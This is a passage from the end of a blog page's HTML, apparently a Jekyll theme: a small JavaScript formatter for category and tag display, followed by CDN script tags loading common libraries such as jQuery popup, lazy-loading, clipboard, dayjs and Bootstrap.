        return `${value}`;
      } else {
        return `<div class="mr-sm-4"><i class="far fa-folder fa-fw"></i>${value}</div>`;
      }
    }

    if (prop === 'tags') {
      if (value === '') {
        return `${value}`;
      } else {
        return `<div><i class="fa fa-tag fa-fw"></i>${value}</div>`;
      }
    }
  }
});
</script>


    <!--
  JS selector for site.
-->

<!-- layout specified -->


  



  <!-- image lazy-loading & popup & clipboard -->
  

  







  
    

    

  



  
    

    

  



  
    

    

  




  <script src="https://cdn.jsdelivr.net/combine/npm/magnific-popup@1/dist/jquery.magnific-popup.min.js,npm/lozad/dist/lozad.min.js,npm/clipboard@2/dist/clipboard.min.js"></script>







  

  

  







  
    

    

  



  
    

    

  



  
    

    

  



  
    

    

  




  <script src="https://cdn.jsdelivr.net/combine/npm/dayjs@1/dayjs.min.js,npm/dayjs@1/locale/en.min.js,npm/dayjs@1/plugin/relativeTime.min.js,npm/dayjs@1/plugin/localizedFormat.min.js"></script>








<script defer src="/assets/js/dist/post.min.js"></script>



<!-- commons -->

<script src="https://cdn.jsdelivr.net/npm/bootstrap@4/dist/js/bootstrap.bundle.min.js"></script>




  </body>

</html>

